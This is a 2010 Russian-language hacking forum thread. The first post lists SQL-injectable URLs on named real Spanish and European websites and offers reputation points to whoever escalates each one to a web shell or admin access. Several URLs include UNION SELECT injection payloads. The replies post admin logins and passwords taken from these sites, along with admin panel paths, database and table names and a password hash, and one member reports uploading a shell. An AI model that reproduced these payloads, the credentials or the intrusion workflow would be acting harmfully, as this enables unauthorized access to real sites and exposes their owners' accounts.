HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу SQL - inj на .ES сайтах, угощайтесь !11
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.11.2010, 03:07
[Dark Green]
Новичок
Регистрация: 13.05.2010
Сообщений: 11
Провел на форуме:
118828

Репутация: 13
По умолчанию
Хекал испанские порталы и кое что осталось... Вот решил поделиться) Заодно посмотреть/проверить Ваши знания. Есть шанс немного проявить себя

За каждую скулю, раскрученную до шелла Вы получите 1-3 к грин репе и 5-15 к репе(в зависимости от способа заливки), за доступ в админку(путь к админке, логин и пасс админа) 1-2 грин репы и 1-10 репы.

тиц 40 пр7

Код:
Code:
http://www.eaea.org/es/topics.php?topic=218'
pr 5

Код:
Code:
http://www.memorimagefestival.org/es/news.php?id=43'
pr 5

Код:
Code:
http://www.elp.uji.es/news.php?id=9+and+1=0+union+select+1,2,3,4,5,6,7--
pr 4

Код:
Code:
http://www.hamo.es/es/news.php?id=21'
pr 4

Код:
Code:
http://www.vigoempresa.com/html/es/news.php?id=729'
pr 3

Код:
Code:
http://www.coupdefouet.eu/es/news.php?year=2009&month=07&id=0'
pr 3

Код:
Code:
http://http://www.look4fashion.es/es/news.php?sprog=&dage=archive&menu=ja&katagori=9'
pr 2

Код:
Code:
http://www.eiffelgres.es/news.php?id=58'
pr 2

Код:
Code:
http://www.eurotechcenter.es/news.php?act=readmore&id=271'
pr 2

Код:
Code:
http://www.natcnc.com/es/news.php?id=4&type=nccNews'
тиц 0 pr 0

Код:
Code:
http://www.franziska.es/news.php?&show_id=4&nshow=shownewscom&go=10224'
тиц 0 pr 0

Код:
Code:
http://www.mantres.es/news.php?tipo=NOTICIA&id=1+and+1=0+union+select+1,2,version(),4,5,database(),7,8,user(),10,11,12--
5.0.90

db1usr2484

db1usr2484@clientes.svnt.com

тиц 0 pr 0

Код:
Code:
http://www.vuototecnica.es/news.php?id=89+and+1=0+union+select+1,2,version(),4,5,6,7,8,9--
5.0.51a-community

По итогам темы гринрепа выросла у:

GIG на 3 пункта

DCrypt +2 пункта

~dos~ +1 пункта

ubi +1 пункта

Фараон получает устное замечание/предупреждение, за оффтоп. Внимательно читай первый пост и не надо имправизаций.

Спасибо всем, кто принял участие в этой разминке)

Тему закрываем !
 
Ответить с цитированием

  #2  
Старый 20.11.2010, 03:15
DCrypt
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479

Репутация: 0
По умолчанию
Цитата:
Сообщение от None  
http://www.mantres.es/news.php?tipo=NOTICIA&id=1+and+1=0+union+select+1, 2,version(),4,5,databa se(),7,8,user(),10,11,12--
login=admin

passw=123

Админку не могу найти.
 
Ответить с цитированием

  #3  
Старый 20.11.2010, 03:23
DCrypt
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479

Репутация: 0
По умолчанию
Админка:

http://www.look4fashion.dk/x_admin/adgang.php

DB если что: look4fashion_dk_db

=========
 
Ответить с цитированием

  #4  
Старый 20.11.2010, 03:41
DCrypt
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479

Репутация: 0
По умолчанию
Цитата:
Сообщение от None  
http://www.memorimagefestival.org/es/news.php?id=43
User: docsbarc

Password: 18admin24

Админку не нашел.

=======
 
Ответить с цитированием

  #5  
Старый 20.11.2010, 03:47
DCrypt
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479

Репутация: 0
По умолчанию
Цитата:
Сообщение от None  
http://www.eurotechcenter.es/news.php?act=readmore&id=271
http://www.eurotechcenter.es/admin.php

Юзер: ETC

Пасс: fawaka

Залить шелл не знаю как.

=========
 
Ответить с цитированием

  #6  
Старый 20.11.2010, 03:50
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
http://www.hamo.es/es/news.php?id=-21+union+select+1,2,concat_ws(0x3a,login,password) ,4,5,6,7,8,9+from+usuarios--

hamo:se73rXKXniZMM

Админку не нашел=(
 
Ответить с цитированием

  #7  
Старый 20.11.2010, 04:08
DCrypt
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479

Репутация: 0
По умолчанию
Цитата:
Сообщение от None  
http://www.coupdefouet.eu/es/news.php?year=2009&month=07&id=0
Админка:

http://www.coupdefouet.eu/admin/index.php

User: admin

Pass: ю«I(ђ"њАoт‚‹© (не понятно).
 
Ответить с цитированием

  #8  
Старый 20.11.2010, 11:04
GIG
Новичок
Регистрация: 17.04.2010
Сообщений: 16
Провел на форуме:
84688

Репутация: 0
По умолчанию
Админка:http://www.memorimagefestival.org/gestor/

Логин: docsbarc

Пароль:18admin24

Шелл:http://[форбиден как бы ]

ps админку запечатал чтобы не перезалили =/
 
Ответить с цитированием

  #9  
Старый 20.11.2010, 11:23
ubi
Новичок
Регистрация: 25.12.2009
Сообщений: 18
Провел на форуме:
278340

Репутация: 0
По умолчанию
Админка:

http://www.vigoempresa.com/panel/

DB: puer24

Таблицы:

ve_textos

ve_empresas_empresas_categorias

ve_empresas_categoria

ve_empresas

pv_textos

pv_news

Испанского незнаю, ничего не нашёл.

Аналогично:

Админка:

http://www.vuototecnica.es/admin

DB: vuototec_db

Таблицы:

products

product_types

newsmodul_pics

newsmodul_news

newsmodul_links

Юзеров так же не нашёл.
 
Ответить с цитированием

  #10  
Старый 20.11.2010, 11:48
GIG
Новичок
Регистрация: 17.04.2010
Сообщений: 16
Провел на форуме:
84688

Репутация: 0
По умолчанию
Цитата:
Сообщение от DCrypt  
DCrypt said:
Ясно.
Сайт кстати поломался.
http://www.memorimagefestival.org/
знаю , главное что шелл залил

UPD - пропатчил сайт , теперь в принципе не залить шелл , восстановил админку , перезалил шелл
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ